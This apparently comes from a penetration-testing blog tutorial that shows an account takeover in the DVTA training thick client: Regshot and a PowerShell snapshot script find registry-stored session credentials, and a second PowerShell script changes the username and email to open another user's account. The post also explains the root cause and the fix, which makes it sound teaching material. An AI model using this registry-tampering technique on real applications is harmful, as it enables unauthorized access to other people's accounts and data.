Learning Thick Client VAPT with me. Part 6. Account Takeover.

Rahul Mondal
3 min read · Oct 24, 2023

Hey all.

Today we will learn about Regshot. It takes two snapshots of the Windows registry and reports the difference, so we can see exactly which keys and values our thick client application creates or changes when we log in. We can download Regshot from here: https://github.com/Seabreg/Regshot

Before that, let's log in to our thick client application as rebecca, add some expenses, and then log out of the application.

Let's open Regshot while we are not logged in to our thick client application and hit the 1st shot.

Now let's log in to our thick client application as a different user (rahul in this walkthrough) and hit the 2nd shot in Regshot.

Now let's click Compare in Regshot, and it will give us an HTML report like the one in the image below.

Let's search the report for the string DVTA. The application's key should appear among the changes, because that is where it writes the logged-in user's details at login.
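The same snapshot-and-compare procedure can be scripted, which is handy when Regshot is not available on the test box. The following PowerShell is an added example and is not part of the original post or of Regshot; it assumes the application writes under HKCU:\Software (which is where the walkthrough finds the DVTA key), so widen the root if your target writes elsewhere.

```powershell
# Added example (not from the original post): a minimal Regshot-style
# snapshot/compare of the current user's hive.
# Assumption: the thick client writes under HKCU:\Software; change $Root
# (e.g. to 'HKCU:\') if the diff comes back empty.

function Get-RegistrySnapshot {
    param([string]$Root = 'HKCU:\Software')
    $snap = @{}
    Get-ChildItem -Path $Root -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                $label = if ($name -eq '') { '(Default)' } else { $name }
                # Join arrays (REG_MULTI_SZ, REG_BINARY) so they compare as strings
                $snap["$($key.Name)\$label"] = [string]::Join(',', @($key.GetValue($name)))
            }
        }
    return $snap
}

function Compare-RegistrySnapshot {
    param([hashtable]$Before, [hashtable]$After)
    foreach ($k in $After.Keys) {
        if (-not $Before.ContainsKey($k)) {
            [pscustomobject]@{ Change = 'Added';    Value = $k; Data = $After[$k] }
        } elseif ($Before[$k] -ne $After[$k]) {
            [pscustomobject]@{ Change = 'Modified'; Value = $k; Data = "$($Before[$k]) -> $($After[$k])" }
        }
    }
    foreach ($k in $Before.Keys) {
        if (-not $After.ContainsKey($k)) {
            [pscustomobject]@{ Change = 'Deleted';  Value = $k; Data = $Before[$k] }
        }
    }
}

# 1st shot: application open but not logged in
$shot1 = Get-RegistrySnapshot
Read-Host 'Log in to the thick client, then press Enter for the 2nd shot' | Out-Null

# 2nd shot: after login
$shot2 = Get-RegistrySnapshot

# Compare, then filter on the application's name exactly as the post does
Compare-RegistrySnapshot -Before $shot1 -After $shot2 |
    Where-Object { $_.Value -match 'DVTA' } |
    Format-Table -AutoSize
```

Drop the `Where-Object` filter to see everything that changed between the two shots; noise from Explorer and other background processes is normal, which is why searching for the application's name is the quickest way to find its key.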

The report lists the key under HKU. Let's open Registry Editor to find it. But where is HKU?

HKU is HKEY_USERS, the hive that holds a subtree for every loaded user profile, named by the user's SID. HKEY_CURRENT_USER (HKCU) is simply an alias for the current user's subtree inside HKU, so the path Regshot reports under HKU\S-1-5-...\ is the same key we reach by expanding HKEY_CURRENT_USER in Registry Editor.

We can see the logged-in user's data (username, email and password) stored in the registry. The application uses it to restore the session on the next start; keeping credentials in a user-writable location like this is already a weakness on its own.

Now let's do one thing. Let's change the username value to rebecca, another genuine user, and change the email to rebecca@test.com. We will not touch the password value in the registry.

Now let's just close the application (without logging out) and open it again. We are in rebecca's account. Note: rebecca's password is not rahul, so the stored password clearly was not checked.

Let's fetch the expenses from View Expenses. If we can see rebecca's expense on clothes, then it is a vulnerability.

We can see rebecca's expense and not rahul's. We are in rebecca's account without ever knowing rebecca's password.
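The same edit can be made from PowerShell instead of Registry Editor, with a backup so the original session can be restored after the test. This is an added example, not code from the original post or from DVTA; it assumes the key path HKCU:\Software\DVTA and the value names username, email and password, so confirm them against your Regshot diff and adjust if they differ.

```powershell
# Added example (not from the original post): reproduce the takeover step
# from the shell. ASSUMPTIONS: the application's key is HKCU:\Software\DVTA
# and its value names are 'username', 'email' and 'password'.
$DvtaKey = 'HKCU:\Software\DVTA'

function Get-DvtaSession {
    param([string]$Path = $DvtaKey)
    Get-ItemProperty -Path $Path | Select-Object username, email, password
}

function Set-DvtaSessionUser {
    param(
        [Parameter(Mandatory)][string]$Username,
        [Parameter(Mandatory)][string]$Email,
        [string]$Path = $DvtaKey
    )
    # Only the identity values change. The stored password still belongs to
    # the original user; if the app still opens the new user's account, it
    # restores the session from these values without re-authenticating.
    Set-ItemProperty -Path $Path -Name username -Value $Username
    Set-ItemProperty -Path $Path -Name email    -Value $Email
}

# Log in as rahul, close the client normally (do not log out), then:
$backup = Get-DvtaSession
Write-Host 'Session values before the edit:'
$backup | Format-List

Set-DvtaSessionUser -Username 'rebecca' -Email 'rebecca@test.com'
Write-Host 'Session values after the edit (password untouched):'
Get-DvtaSession | Format-List

# Relaunch the client and open View Expenses: rebecca's records confirm the takeover.
# Afterwards, put the original session back:
# Set-DvtaSessionUser -Username $backup.username -Email $backup.email
```

Run it from a normal (non-elevated) prompt: HKCU is writable by the logged-on user, which is exactly why an application must not trust the identity it finds there.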

So we learned how to perform an account takeover by using Regshot to locate the session data and then manipulating the registry. The root cause is that the application trusts an identity stored in a user-writable location and restores the session without re-validating the password; the fix is to keep session state on the server (or at least not to rebuild a session from client-side values without authenticating). Let's meet in the next part.
